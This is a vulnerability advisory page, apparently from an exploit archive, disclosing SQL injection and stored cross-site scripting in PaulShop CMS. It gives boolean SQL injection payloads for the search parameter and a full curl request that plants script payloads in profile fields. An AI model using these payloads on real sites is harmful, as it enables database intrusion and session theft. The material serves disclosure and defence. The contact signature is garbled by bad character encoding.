PaulShop Cross Site Scripting / SQL Injection

PaulShop Cross Site Scripting / SQL Injection: Posted Jul 24, 2017; Authored by BTIS Team; PaulShop suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 7c3af021c23b188fe48f320ae94baafff3bb919f1fe1a6986ef714449c4046f4; Download | Favorite | View

PaulShop Cross Site Scripting / SQL Injection

# Exploit Title: PaulShop CMS - Sql Injection and stored XSS
# Date: 07/23/2017
# Exploit Author: BTIS Team (http://www.btis.vn)
# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]
# Version: 03/27/2017
# Tested on: Apache/2.4.7 (Ubuntu)
# Contact: research@btis.vn
# Can not contact vendor
 
  
 
1. Description
 
- SQL Injection on Search page with "q" parameter (GET)
 
- Stored XSS on member's profile page with parameters: firstname, lastname, address, city, state, zipcode, phone, fax, delivery[address], delivery[city], delivery[state], delivery[zipcode]
 
2. Examples
 
  
 
- SQL injection: 
 
  
 
# http://localhost/shop/en/category/tables?q=[SQL INJECTION HERE]
 
# Payload: - True condition: europe' and 1=1)-- -
 
           - False condition: europe' and 1=0)-- -
 
  
 
- Stored XSS: 
 
  
 
# Payload: %22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
 
# curl -X POST \
 
  'http://localhost/shop/en/account?save=1' \
 
  -H 'cookie: cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \
 
  -b 'cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \
 
  -d 'email=btis%40mailinator.com&password=123456xyz&firstname=BTIS%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=VN%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&address=address%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&city=city%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&state=HCM%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&zipcode=700000%22%3E%3Cscript%3Ealert%2812%29%3C%2Fscript%3E&country=VN&phone=%22%3E%3Cscript%3Ealert%2810%29%3C%2Fscript%3E&fax=fax%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&delivery%5Baddress%5D=adr2%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&delivery%5Bcity%5D=city2%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&delivery%5Bstate%5D=MNB%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&delivery%5Bzipcode%5D=800000%22%3E%3Cscript%3Ealert%2811%29%3C%2Fscript%3E&delivery%5Bcountry%5D=AD&save=Save'
 
  
 
Quan Minh TAC/m / TrAEdega>>ng phA2ng ka>>1 thuaot
 <mailto:tamqm@btis.vn> tamqm@btis.vn / 01284 211 290
 
CANG TY CANG NGHa>> BaoC/O TAN 
028 3810 6288 a 028 38106289
5A TraoSSn VAn DAEdeg, phAEdega>>ng 13, quaon TAC/n BA!nh, Tp.Ha>> ChA Minh
 <http://www.btis.vn> www.btis.vn

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

PaulShop Cross Site Scripting / SQL Injection

PaulShop Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PaulShop Cross Site Scripting / SQL Injection

Share This

PaulShop Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems